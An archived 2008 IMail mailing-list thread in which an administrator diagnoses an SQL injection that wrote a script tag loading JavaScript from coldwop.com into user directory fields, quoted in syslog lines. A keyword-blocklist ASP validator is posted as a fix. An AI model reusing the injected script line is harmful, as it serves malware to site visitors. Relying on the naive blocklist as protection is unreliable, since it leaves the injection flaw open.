Thanks for the advice. Yes, we are running a site that does allow
access to certain portions of the database, so I'm assuming we got hit
from that side. We'll see. We've added a function to catch the
injectors to all our web pages in an include file. Just wondering if
this would suffice. (If the function does match, we aren't currently
doing anything - just ending the page - do you have any suggestions in
that regard as well?)
pr_ValidateInputAll
function pr_ValidateInputAll()
dim prReqName
dim arToCompare
redim arToCompare(2)
arToCompare(0) = "drop"
arToCompare(1) = "delete"
arToCompare(2) = "update"
for each prReqName in Request.Form
pr_ValidateInput Request.Form(prReqName), arToCompare
next
for each prReqName in Request.QueryString
pr_ValidateInput Request.QueryString(prReqName), arToCompare
next
end function
function pr_ValidateInput(sInput, arToCompare)
dim nLen, nPos1, nPos2
nLen = len(sInput)
if nLen > 15 then
if Instr(1, sInput, "VARCHAR", 1) > 0 then
Response.End
end if
for i = lbound(arToCompare) to UBound(arToCompare)
nPos1 = InStr(1, sInput, arToCompare(i), 1)
if nPos1 > 0 then
nPos2 = InStr(nPos1 + 1, sInput, "table", 1)
if nPos2 > 0 and nPos2 > nPos1 then
response.End
end if
end if
next
end if
end function
Darin Cox wrote:
Best way to find out is to grep all of your web server logs for something
like "VARCHAR(". That will tell you what pages are being attacked.
After that, you'll have to check the source code of the individual pages to
see if they are vulnerable, and take appropriate steps to patch them
(quickly).
Darin.
----- Original Message -----
From: "Matt" <[EMAIL PROTECTED]>
To: <[email protected]>
Sent: Saturday, June 21, 2008 7:06 PM
Subject: Re: [IMail Forum] Coldwop
Oops, I misread this.
You were hacked using SQL injection from the Web side of things. I'm
not sure what interface was hit, but it could be that webmail is
vulnerable to this. There's a bunch on SANS about these attacks:
http://www.google.com/search?sourceid=mozclient&ie=utf-8&oe=utf-8&q=sql+injection+site%3Aisc%2Esans%2Eorg
My guess is that this is Storm Botnet originated stuff. They hack sites
through a very common coding vulnerability in database connected
websites, insert redirection code to an infected site, and when
unsuspecting users visit the intended site, they get infected by means
of one of many vulnerabilities in desktop apps that they target.
Your logs are showing the aftermath of having the bad data in there.
This will continue to happen over and over again until you patch
whatever is vulnerable. You either have some sort of custom site set up
that has access to this particular database, or it was hacked straight
through IMail's Web interfaces. I would love to know which one.
Matt
Kevin Rogers wrote:
Thanks Matt. I use an external SQL Server for Imail and all my users
had their USERDIR and MAILADDR and TIMEZONE fields changed to include
that coldwop.com javascript (e.g., "someuser" had their USERDIR set to
"d:\imail\someuser<script src=http://www.coldwop.com/b.js></script>")
I've fixed that. So what you're saying is that you don't think any
passwords have been compromised, but I've just been hit by the SQL
injector attacker?
Matt wrote:
This looks exactly like the SQL injection attacker from recent months
is trying to exploit a Postfix flaw by injecting into IMAP
interfaces. If this is causing you problems, it would seem that
IMail then isn't properly handling this bad data resulting in a
denial of service, though I strongly suspect that you are not
vulnerable otherwise. It could also be simply curious timing with
two different issues.
Matt
Kevin Rogers wrote:
Today our web mail application stopped working. Some users are
reporting IMAP issues as well. I've restarted all the services and
rebooted, but that hasn't helped. The error when entering web mail
is that there is an "illegal character in the path". When I checked
the syslog, I found thousands of entries like this:
06:21 12:18 SMTP-(4722016d00006d72) ERR MyDomain.com read open fail
(d:\imail\RBG\myuser<script
src=http://www.coldwop.com/b.js></script>\bulk.mbx)
06:21 12:18 SMTP-(46ed01d600006d40) ERR MyDomain.com read open fail
(d:\imail\RBG\myuser<script
src=http://www.coldwop.com/b.js></script>\main.mbx)
Coldwop.com apparently is a malicious site (my Trend Micro won't
even let me go there). Have I been hacked by them?
Anyone seen this?
I'm running Imail 9.23 on Windows Server 2003, all patches.
Thanks for your help.
Kevin
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html
